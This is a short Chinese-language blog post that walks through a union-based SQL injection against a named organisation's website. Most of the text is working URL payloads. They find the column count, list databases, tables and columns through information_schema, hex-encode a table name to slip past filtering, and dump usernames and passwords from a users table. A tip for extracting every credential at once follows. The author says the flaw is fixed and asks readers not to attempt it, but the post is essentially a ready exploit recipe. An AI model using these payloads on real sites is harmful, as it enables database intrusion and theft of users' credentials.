簡單的SQL注入某社會組織

好早之前的網站了,漏洞已經被填上了,請大家不要嘗試!

目標:http://www.qdmjzz.org/

1、首先是拆解:http://www.qdmjzz.org/show.php?id=7829 and 1=2 union select 1,2,3,4,5,6,7-- 這樣一直找到正確的列數 也可以直接用order by 後面接數,表示有多少行。這樣就可以猜到共有19行。
發現可以回顯的是3,4,13.在這些位置我們可以使用函數來回顯數據庫裏面的數據。

2、查詢數據庫和表:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28schema_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.SCHEMATA--
出現內容如下:



3、查詢摸表中有多少項:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.tables%20where%20table_schema=database%28%29--

4、查詢某一張表有哪些字段:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x7573657273--



注意最後的users轉換成16進制,繞過對字符的過濾。

5、查詢每一個字段的內容:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,passwd,name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20users



當讓這樣只是得到一個數據而已,如果想要將所有用戶名密碼都爆出,羣裏面的一位女士給出的答案:用group_concat(name),group_concat(passwd)。這樣就可以回顯了。




發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章